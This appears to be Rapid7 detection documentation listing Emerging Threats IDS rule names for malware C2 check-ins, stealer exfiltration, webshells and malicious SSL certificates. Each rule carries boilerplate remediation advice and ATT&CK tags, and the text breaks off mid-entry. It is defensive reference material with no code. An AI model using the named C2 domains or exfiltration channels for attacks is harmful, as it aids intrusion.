Suspicious Network Activity - IDS

ET HUNTING Suspicious EXE Download Content-Type image/jpeg

These detections identify suspicious activity from network sessions evaluated by Insight Network Sensor.

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Adobe PKG Download Flowbit Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO ARM File Requested via WGET (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Flowbit set for POST to Quicken Updater

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO GET Minimal HTTP Headers Flowbit Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO maas.io Image Download Flowbit Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO McAfee AV Download (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO McAfee AV Download - Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (exe) unset (no exe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (msi) unset (no exe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (msp) unset (no exe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request (no .exe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible MSXMLHTTP Request to Dotted Quad

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Possible WinHttpRequest (no .exe)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Symantec Download Flowbit Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO User-Agent (wininet)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO Windows Update/Microsoft FP Flowbit

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET INFO ZoneAlarm Download Flowbit Set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] Backdoor.BEACON SSL Cert Inbound (bigtopweb .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [401TRG] Backdoor.BEACON SSL Cert Inbound (infinitysoftwares .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE [401TRG] Malicious SSL Cert (Dreambot CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE [401TRG] Observed Backdoor.SUNBURST CnC Domain (bigtopweb .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] Observed Backdoor.SUNBURST CnC Domain (infinitysoftwares .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [401TRG] PS/PowDesk Checkin (APT34)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 404 Response with an EXE Attached - Likely Malware Drop

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 44Calibar Variant Exfil via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE 44 Caliber Stealer Data Exfil via Discord

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (bigudp)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (dns)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (stop)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABCbot CnC Instruction (syn)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Bancos/DarkTequila CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Downloader CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dyre CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gootkit CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gootkit MITM)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Gozi MITM)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Quakbot CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL Certificate Detected (Sinkhole)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TorrentLocker CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Vawtrak CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Vawtrak CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Zeus CnC)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Gootkit C2)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL certificate detected (Likely Shylock/URLzone/Gootkit/Zeus Panda C2)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Malware C2)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE ABUSE.CH SSL Fingerprint Blacklist Malicious SSL Certificate Detected (Malware C2)

Description

Abuse.ch is a non-profit organization that provides various signatures, blacklists, and other types of indicators for common malware families and botnets. These alerts may require different methods of validation. Please refer to the corresponding IDS rule for further information.

Recommendation

Review all relevant alerts and pertinent logs related to the IP or endpoint in question, and review the reference URLs provided in the signature for additional context. If a system has been compromised, rebuild the system from a known, good baseline image that has been validated by your organization.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Agent.BAAB Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AgentTesla Communicating with CnC Server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AgentTesla PWS HTTP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK/BKDR_HTV.ZKGD-A CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK/BKDR_HTV.ZKGD-A Fake HTTP 500 Containing Encoded Commands Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AHK.CREDSTEALER.A MalDoc Retrieving Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alfa/Alpha Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Alina Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alina Server Response Code

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alina User-Agent(Alina)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alman Dropper Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AlphaCrypt CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt CnC Beacon 5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt CnC Beacon 6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE AlphaCrypt Connectivity Check 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Alphacrypt/TeslaCrypt Ransomware CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Alureon Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey CnC Check-In

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey Stealer CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Amadey Stealer CnC - BotKiller Module Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/AhMyth RAT Init Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/AhMyth RAT WebSocket Session

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Android/FakeKakao checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Checkin Dec 29 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Check-in Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Andromeda Downloading Module

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AntiVirus exe Download Likely FakeAV Install

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AntSword Webshell User-Agent Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AnubisNetworks Sinkhole HTTP Response - 195.22.26.192/26

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Anuna PHP Backdoor Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Anuna PHP Backdoor Sucessful Exploit

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ApolloLocker Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ApolloLocker Ransomware CnC Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE AppleJeus - JMT Trading CnC Activity (OSX Variant)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - JMT Trading CnC Activity (Windows Variant)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - Kupay Wallet CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AppleJeus - Union Crypto CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT15/NICKEL KETRUM CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT15/NICKEL Related CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 SEDNIT Variant CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 SEDNIT Variant CnC Beacon 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28/SkinnyBoy Checkin

Description

